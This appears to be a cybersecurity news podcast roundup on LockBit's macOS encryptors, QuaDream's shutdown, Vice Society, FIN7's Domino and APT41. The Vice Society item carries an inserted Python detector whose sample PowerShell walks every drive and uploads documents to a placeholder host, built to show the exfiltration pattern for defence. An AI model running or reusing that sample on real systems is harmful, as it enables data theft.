Cyber Security Headlines: LockBit on macOS, low code security, and QuaDream shuts down

Ransomware comes for macOS

The massive LockBit ransomware operation traditionally designed its encryptors to target Windows, Linux and VMware ESXi servers. However, researchers at MalwareHunterTeam discovered a ZIP archive on VirusTotal containing new encryptors, including ones for macOS. This likely marks the first major ransomware operation specifically targeting Macs. The encryptors not only target modern Apple silicon, but also older PowerPC CPUs, so even your old Xserve is at risk. An analysis by Bleeping Computer found that these builds lacked the refinement of other LockBit encryptors, indicating they are test builds.

(Bleeping Computer)

The security considerations of low code

Security Week’s Kevin Townsend looked at why understanding the security considerations of low-code and no-code solutions remains critical. Often security analysts don’t have coding skills, but would benefit from automating time-consuming workflows. These automation solutions can help quickly deploy security workflows, potentially avoiding months of development. They can help replace paper forms with apps, or automatically remediate simple alerts. The downside is that these tools require a lot of access to an organization, creating a huge attack surface if they are compromised. If these automation solutions are used by one-person IT shops, those shops might not be prepared for the risk. In larger shops, these tools easily create sprawling shadow IT that can be hard to centralize.

(Security Week)

Israeli offensive cyber company shutting down

Calcalist’s sources say the Israeli firm QuaDream informed employees it will cease operations in the coming days. This comes after damning reports last week from Microsoft and Citizen Lab. Their researchers found QuaDream’s spyware tools being used to target journalists, advocacy groups, and opposition groups in at least 10 countries. Last year Reuters reported QuaDream developed zero-click spyware similar to that used by NSO Group. Calcalist’s sources say QuaDream hasn’t been fully active for months.

(Calcalist)

Montana legislature approves statewide TikTok ban

We’ve covered several US states banning TikTok on government-managed devices. But now the Montana House of Representatives has approved a bill banning the social media app TikTok in the state by a vote of 54-43. This bill prohibits downloads of the app on any device in the state. The bill now goes to Governor Greg Gianforte for signature, although it’s unclear if it will be signed into law. If signed, it goes into effect in January, with fines against app stores and TikTok of $10,000 per day for violations.

(BBC)

And now a word from our sponsor, Pentera

This episode of Cyber Security Headlines is made possible in part by Pentera. Today over 60% of cyber attacks involve the use of exposed credentials. Now, for the first time, security teams can address this critical threat head-on. Pentera collects an organization’s leaked credentials and automatically tests their exploitability across the external and internal attack surface. 

Pentera’s customers find that leveraging the Pentera automated security validation platform as part of their exposure management strategy increases their ability to identify security gaps, improves the efficiency of remediation processes, and maximizes their security readiness. 
To learn more, visit Pentera.io

Vice Society using PowerShell tool for exfiltration

Researchers at Palo Alto Networks report that the pernicious ransomware organization has begun using a PowerShell-based tool for data exfiltration. The researchers found that avoiding external tooling is increasingly common, since a native PowerShell script is harder for security tools to detect. This particular tool looks for mounted drives on a system, then recursively searches their root directories and exfiltrates data over HTTP. Palo Alto said its exclusion criteria show a “professional level of coding.”
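A detection-side illustration of the behaviour chain described above (drive enumeration, recursive directory walk, HTTP upload), written here as an added example and not code from Palo Alto Networks or from the tool itself. The script-block log entries and the upload URL are constructed samples; the cmdlet patterns are generic PowerShell, not signatures from the report.

```python
import re

# Constructed PowerShell ScriptBlock log excerpts (Event ID 4104 style), keyed by
# script name. None of this is real Vice Society code; it is sample input only.
SAMPLE_SCRIPT_BLOCKS = {
    "backup_job.ps1": """
        $drives = Get-PSDrive -PSProvider FileSystem
        foreach ($d in $drives) { Get-ChildItem $d.Root -Recurse | Compress-Archive -DestinationPath D:\\backup.zip }
    """,
    "suspicious.ps1": """
        $drives = Get-WmiObject Win32_LogicalDisk | Where-Object { $_.DriveType -eq 3 }
        foreach ($d in $drives) {
          Get-ChildItem -Path $d.DeviceID -Recurse -ErrorAction SilentlyContinue |
            Where-Object { $_.Extension -in '.docx','.xlsx','.pdf' } |
            ForEach-Object { Invoke-WebRequest -Uri 'http://198.51.100.10/upload' -Method Post -InFile $_.FullName }
        }
    """,
    "inventory.ps1": """
        Get-PSDrive | Format-Table
    """,
}

# One regex per behaviour from the report. Any single indicator is common in
# admin scripts; the signal is all three together in one script block.
INDICATORS = {
    "drive_enum": re.compile(r"Get-PSDrive|Win32_LogicalDisk|\[System\.IO\.DriveInfo\]", re.I),
    "recursive_walk": re.compile(r"Get-ChildItem[^\n]*-Recurse|\[System\.IO\.Directory\]::EnumerateFiles", re.I),
    "http_upload": re.compile(
        r"Invoke-WebRequest[^\n]*-Method\s+Post|Invoke-RestMethod[^\n]*-Method\s+Post|\.UploadFile\(|\.UploadData\(",
        re.I,
    ),
}


def score_script_block(text: str) -> dict:
    """Return which indicators fire and whether the full exfiltration chain is present."""
    hits = {name: bool(rx.search(text)) for name, rx in INDICATORS.items()}
    hits["exfil_chain"] = all(hits[name] for name in INDICATORS)
    return hits


def flag_suspicious(blocks: dict) -> list:
    """Names of script blocks that enumerate drives, walk them recursively, and upload over HTTP."""
    return sorted(name for name, text in blocks.items() if score_script_block(text)["exfil_chain"])


if __name__ == "__main__":
    for name, text in SAMPLE_SCRIPT_BLOCKS.items():
        print(name, score_script_block(text))
    print("flagged:", flag_suspicious(SAMPLE_SCRIPT_BLOCKS))
```

The backup script trips two of the three indicators but not the upload, which is why requiring the whole chain keeps the rule from firing on routine administration.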

(The Hacker News)

Operation Shamrock targets pig butchering scams

We’ve covered FBI warnings about the rise in so-called pig butchering scams. These outpaced business email compromise schemes in 2022 in the US, with victims tricked into sending cryptocurrency on the promise of an investment return. Now Santa Clara County Deputy District Attorney Erin West wants to bring local law enforcement to bear on these cases, saying it’s no longer acceptable for local law enforcement to just say “we don’t do crypto.” West launched Operation Shamrock to help law enforcement and other stakeholders focus on education, seizure, and disruption for these scams.

(CyberScoop)

Dominos lineup for FIN7

Researchers at IBM Security X-Force published a report detailing how the newly dubbed Domino malware strain, developed by the Russia-based FIN7 cybercrime group, has been seen in use by members of the now-defunct Conti ransomware organization. The group uses Domino for follow-on exploitation once it has compromised a system, delivering infostealers. Researchers began seeing Domino in the wild in October 2022. Other ransomware operators have used Domino since then, but only sporadically.

(The Hacker News)

Chinese threat actors use red team tool in attack

The Google Threat Analysis Group reports that a China-affiliated threat group used the Google Command and Control red teaming tool in an attack on a Taiwanese media organization. APT41 orchestrated the attacks, sending phishing emails with links to password-protected Google Drive files. The group used the tool to receive commands from Google Sheets and exfiltrate data to Drive. The group previously used the tool in a July 2022 attack against an Italian organization. Google said it increasingly sees China-based attackers using open source red team tools, like Cobalt Strike, in attacks. It also found malicious actors increasingly using tools written in Go due to its cross-platform compatibility.

(Security Affairs)

Rich Stroffolino
Rich Stroffolino is a podcaster, editor and writer based out of Cleveland, Ohio. Since 2015, he's worked in technology news podcasting and media. He dreams of someday writing the oral history of Transmeta.